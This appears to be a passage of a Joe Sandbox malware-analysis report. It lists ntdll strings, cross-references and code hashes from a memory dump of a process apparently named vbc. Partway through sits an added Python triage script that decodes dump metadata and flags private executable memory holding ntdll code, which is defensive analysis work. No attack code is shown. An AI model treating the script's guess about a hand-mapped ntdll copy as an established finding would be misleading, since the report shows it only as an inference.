                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05CB2180
                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 05CB2160, 05CB219A, 05CB21BA
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05CB2178
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CB2165
                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 05CB219F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                  • Opcode ID: 47e39eca03b7f8bf6d197e82c67cce9bfe6324e5f61fa59912f4e9f23a68b4cd
                                                                                                                                                  • Instruction ID: 6078417645e99464e72eb877cfed23e0d84c865aab611d8ce065768930f13541
                                                                                                                                                  • Opcode Fuzzy Hash: 47e39eca03b7f8bf6d197e82c67cce9bfe6324e5f61fa59912f4e9f23a68b4cd
                                                                                                                                                  • Instruction Fuzzy Hash: 8F31093AB40224B7F721CA95CC85F9E7BB9EB54A50F054CA9FA057B240D6B09F01D6A0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                  • API String ID: 0-2518169356
                                                                                                                                                  • Opcode ID: 3e36870da52dfe089a7210cacd46f19c5db3fe4281e5512541e89f1985a42ea6
                                                                                                                                                  • Instruction ID: 67ef492fcd5ff1883c825f1e1d95f4464c979e7e36ee959ee87b89054c852dcd
                                                                                                                                                  • Opcode Fuzzy Hash: 3e36870da52dfe089a7210cacd46f19c5db3fe4281e5512541e89f1985a42ea6
                                                                                                                                                  • Instruction Fuzzy Hash: D191C176E00619CBCB25CF58C885ABEBBB1FF48310F5949A9E811E7350E775EA41CB90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                  • Opcode ID: dbbbd76f80226d575731db19a5b3c94e7ddf64a67f5d84edbf82e4ea0c40b800
                                                                                                                                                  • Instruction ID: f65c651b3e912f1592fec0603f323d4d6cb99f4f8e61625434fc9b7a7cbed1c9
                                                                                                                                                  • Opcode Fuzzy Hash: dbbbd76f80226d575731db19a5b3c94e7ddf64a67f5d84edbf82e4ea0c40b800
                                                                                                                                                  • Instruction Fuzzy Hash: 8BC18A756483828FD711CF19C944B6AB7E6FF84708F049C6AF8968B250E738CA49CF56
                                                                                                                                                  Strings
                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 05C7855E
                                                                                                                                                  • @, xrefs: 05C78591
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C78421
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C78422
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                  • Opcode ID: c94e32bc51b2b695f3c9c41e3556c8086b078cc5f049461a49d8dfe1f72bc546
                                                                                                                                                  • Instruction ID: 6582fc112824bfa49b1835358719a77b8d9917f7dd72a7d1c483027cfb1d2589
                                                                                                                                                  • Opcode Fuzzy Hash: c94e32bc51b2b695f3c9c41e3556c8086b078cc5f049461a49d8dfe1f72bc546
                                                                                                                                                  • Instruction Fuzzy Hash: 8E91AE71608344AFE721EF64CC59EBBBAE8FB84744F440D2EFA8592140E774DA44DB62
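Every block above names the same "Memory Dump Source" (process 6, dump 2, base 05C10000, fields 00000040.00001000.00020000, "based on PE: true") and lists ntdll-internal strings (minkernel\ntdll\ldrinit.c, LdrpInitializeProcess, ...). The script below is an added triage example, not Joe Sandbox's code and not part of this report: it decodes the .sdmp file name against the winnt.h memory constants (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE, which are exact), checks whether the dumped bytes start with a PE header, and looks for the ntdll marker strings quoted on this page. The field layout of the .sdmp name is an assumption inferred from the names shown here, the function names are the author's own, and the region bytes are a constructed stand-in rather than the real dump.

```python
# Added example (not Joe Sandbox's code): decode a .sdmp memory-dump file name and
# triage the region's bytes. The .sdmp field layout is an ASSUMPTION inferred from
# the names on the page; build_sample_blob() is a constructed stand-in region.
import re
import struct

# Windows memory constants from winnt.h (exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <process idx>.<dump idx>.<id>.<base>.<protect>.<state>.<type>.<extra>.sdmp
# First two fields decimal, the fixed-width ones hexadecimal.
SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)

# ntdll-internal strings quoted in this report section (ANSI in the binary).
NTDLL_MARKERS = (b"minkernel\\ntdll\\ldrinit.c", b"minkernel\\ntdll\\ldrutil.c",
                 b"LdrpInitializeProcess", b"LdrpInitShimEngine")

def parse_sdmp_name(name):
    """Return a dict of the name's fields, or None if the name does not match the layout."""
    m = SDMP_RE.match(name)
    if m is None:
        return None
    proc, dump, _ident, base, protect, state, mem_type, _extra = m.groups()
    return {"process_index": int(proc, 10), "dump_index": int(dump, 10),
            "base": int(base, 16), "protect": int(protect, 16),
            "state": int(state, 16), "mem_type": int(mem_type, 16)}

def has_pe_header(blob):
    """True when the region starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def find_ntdll_markers(blob):
    """Markers present as ANSI or UTF-16LE text, decoded for reporting."""
    found = []
    for marker in NTDLL_MARKERS:
        if marker in blob or marker.decode("ascii").encode("utf-16-le") in blob:
            found.append(marker.decode("ascii"))
    return found

def triage_dump(name, blob):
    """Combine file-name metadata with content checks into one triage record."""
    meta = parse_sdmp_name(name)
    if meta is None:
        return None
    base_protect = meta["protect"] & 0xFF      # strip PAGE_GUARD / PAGE_NOCACHE modifiers
    pe = has_pe_header(blob)
    markers = find_ntdll_markers(blob)
    # Private, committed, RWX memory holding a PE image with ntdll strings did not get
    # there through the image loader (that would be MEM_IMAGE): flag it as a candidate
    # hand-mapped ntdll copy for the analyst to confirm against the process's module list.
    suspicious = (meta["mem_type"] == 0x20000 and meta["state"] == 0x1000
                  and base_protect == 0x40 and pe and bool(markers))
    return {"process_index": meta["process_index"], "base": f"0x{meta['base']:08X}",
            "protect": PAGE_PROTECT.get(base_protect, hex(meta["protect"])),
            "state": MEM_STATE.get(meta["state"], hex(meta["state"])),
            "type": MEM_TYPE.get(meta["mem_type"], hex(meta["mem_type"])),
            "pe_header": pe, "ntdll_markers": markers, "suspicious": suspicious}

def build_sample_blob():
    """Constructed region: minimal MZ/PE headers followed by two of the marker strings."""
    e_lfanew = 0x80
    blob = bytearray(b"MZ") + bytearray(0x3C - 2)
    blob += struct.pack("<I", e_lfanew)
    blob += bytearray(e_lfanew - len(blob))
    blob += b"PE\x00\x00" + bytearray(0x100)
    blob += b"minkernel\\ntdll\\ldrinit.c\x00LdrpInitializeProcess\x00"
    return bytes(blob)

SAMPLE_NAME = "00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp"

if __name__ == "__main__":
    for key, value in triage_dump(SAMPLE_NAME, build_sample_blob()).items():
        print(f"{key:>14}: {value}")
```

Run against the real dump, the same record tells the analyst at a glance that the region is not the loader-mapped ntdll image (that would be MEM_IMAGE) but private RWX memory holding a PE with ntdll loader code, which is what to check first when deciding whether process 6 is running a second, hand-mapped copy of ntdll.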
Strings
• HEAP: , xrefs: 05CA54E0, 05CA55A1
• ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 05CA54ED
• HEAP[%wZ]: , xrefs: 05CA54D1, 05CA5592
• ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 05CA55AE
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
• API String ID: 0-1657114761
Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 05CB22B6
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 05CB21D9, 05CB22B1
• .Local, xrefs: 05C728D8
• SXS: %s() passed the empty activation context, xrefs: 05CB21DE
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
Strings
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 05CA106B
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05CA1028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05CA0FE5
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 05CA10AE
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Strings
• Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 05CB362F
• Querying the active activation context failed with status 0x%08lx, xrefs: 05CB365C
• LdrpFindDllActivationContext, xrefs: 05CB3636, 05CB3662
• minkernel\ntdll\ldrsnap.c, xrefs: 05CB3640, 05CB366C
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
• API String ID: 0-3779518884
Strings
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 05CAA992
• minkernel\ntdll\ldrinit.c, xrefs: 05CAA9A2
• LdrpDynamicShimModule, xrefs: 05CAA998
• apphelp.dll, xrefs: 05C62462
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
Strings
• \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 05C3CD34
• InstallLanguageFallback, xrefs: 05C3CD7F
• @, xrefs: 05C3CD63
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
• API String ID: 0-1757540487
Strings
• LdrpInitializePerUserWindowsDirectory, xrefs: 05CB82DE
• minkernel\ntdll\ldrinit.c, xrefs: 05CB82E8
• Failed to reallocate the system dirs string !, xrefs: 05CB82D7
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
Strings
• PreferredUILanguages, xrefs: 05CFC212
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 05CFC1C5
• @, xrefs: 05CFC1F1
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 05CC4899
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05CC4888
• LdrpCheckRedirection, xrefs: 05CC488F
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 05CC2104
• Process initialization failed with status 0x%08lx, xrefs: 05CC20F3
• LdrpInitializationFailure, xrefs: 05CC20FA
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 05CCCFBD
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @
• API String ID: 4062629308-2766056989
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Strings
• *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05CE3011
• , xrefs: 05CE32B8
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
• API String ID: 0-4088147954
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Strings
• LdrpResGetMappingSize Exit, xrefs: 05C4AC7C
• LdrpResGetMappingSize Enter, xrefs: 05C4AC6A
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
• API String ID: 0-1497657909
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: 0$Flst
• API String ID: 0-758220159
Strings
• kLsE, xrefs: 05C40540
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05C4063D
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
                                                                                                                                                  • Opcode ID: 38ef69198526c3963f728cca7f8fc05c1ed6a5e760bb25ea2e60727a4748b3da
                                                                                                                                                  • Instruction ID: e984fa049850e08ae202ebab177583045ce08244795f99721f870d3cdc3a92d5
                                                                                                                                                  • Opcode Fuzzy Hash: 38ef69198526c3963f728cca7f8fc05c1ed6a5e760bb25ea2e60727a4748b3da
                                                                                                                                                  • Instruction Fuzzy Hash: 0251AC716547429BC724EF69C448AE3B7E9BF84304F004C3EEA9A9B240E7709645CF96
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 05CB280C
                                                                                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 05CB2807
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                                                                  • API String ID: 0-2104531740
                                                                                                                                                  • Opcode ID: 63f56a2ab4c98508fa069043f98cb13de1c514bb222d8a6ea9f2d4d296aa2933
                                                                                                                                                  • Instruction ID: ac45698eccf762c113b48be11112a844dfe67cf9c7b0c09cd807f0e0fd1ddd6f
                                                                                                                                                  • Opcode Fuzzy Hash: 63f56a2ab4c98508fa069043f98cb13de1c514bb222d8a6ea9f2d4d296aa2933
                                                                                                                                                  • Instruction Fuzzy Hash: 1541F47A600215ABEB24DF56C840EBAF3B6FF94B10F11882DE855AB640D770DD41CB94
                                                                                                                                                  Strings
                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 05C4A2FB
                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 05C4A309
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                  • Opcode ID: 992e384bf09933f18f64d0d02aca48dce92a00f6cc1f4e6edd295293ffb8bbf5
                                                                                                                                                  • Instruction ID: 3a60afbb95caee52d174fd1d0156894dea4368df46f4df53bbd6f8e222a218b1
                                                                                                                                                  • Opcode Fuzzy Hash: 992e384bf09933f18f64d0d02aca48dce92a00f6cc1f4e6edd295293ffb8bbf5
                                                                                                                                                  • Instruction Fuzzy Hash: C0410E35A44259CBCB21CF69D840F6A7BB6FF80704F1448A9EC02DB6A0E374CA40CB40
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 05C81050
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05C81025
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                                                  • API String ID: 0-2976085014
                                                                                                                                                  • Opcode ID: 1c42a6f9a8a5c13d0cfd5be2383abec62da427e9031e051912bf9a5ee16cb405
                                                                                                                                                  • Instruction ID: 38ecffd33c7731b12ff0410e2f2b03cc274429325d6faea1f80b300443cd9131
                                                                                                                                                  • Opcode Fuzzy Hash: 1c42a6f9a8a5c13d0cfd5be2383abec62da427e9031e051912bf9a5ee16cb405
                                                                                                                                                  • Instruction Fuzzy Hash: 8F318672A00588AFDB12EF95CC88EAFBBB9EB84B54F050925E501A7250D7B49D41DBA0
                                                                                                                                                  Strings
                                                                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 05CDAF2F
                                                                                                                                                  • Ek<, xrefs: 05CDAF41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Ek<$NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                  • API String ID: 0-2792189438
                                                                                                                                                  • Opcode ID: 6d93ec9f9f7fe5535381d93f841cbe49089cdf3789f36e00dc71f8657c03a0a7
                                                                                                                                                  • Instruction ID: 24185b40421ef4d1b4d6520756dd77fc25e39040813a12a7a839f6375db0208e
                                                                                                                                                  • Opcode Fuzzy Hash: 6d93ec9f9f7fe5535381d93f841cbe49089cdf3789f36e00dc71f8657c03a0a7
                                                                                                                                                  • Instruction Fuzzy Hash: C43108B6A04614AFDB15DF68CC45F6AFBB5FB44B10F148966F601D7740D738A900CBA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                  • Opcode ID: 9661bbb11352c6a7316768db70cb188ca09ab45303cd31d7e7c2ec0e33ebde7d
                                                                                                                                                  • Instruction ID: 21d1ab8a64bd08f8928997ff6268beb73ed4fb6113c4d7dc974e38ee5a48c708
                                                                                                                                                  • Opcode Fuzzy Hash: 9661bbb11352c6a7316768db70cb188ca09ab45303cd31d7e7c2ec0e33ebde7d
                                                                                                                                                  • Instruction Fuzzy Hash: 1801F4B2254704AFD312DF18CD4AF2A77E8E744715F008D7AB558C7590E734D904DB4A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
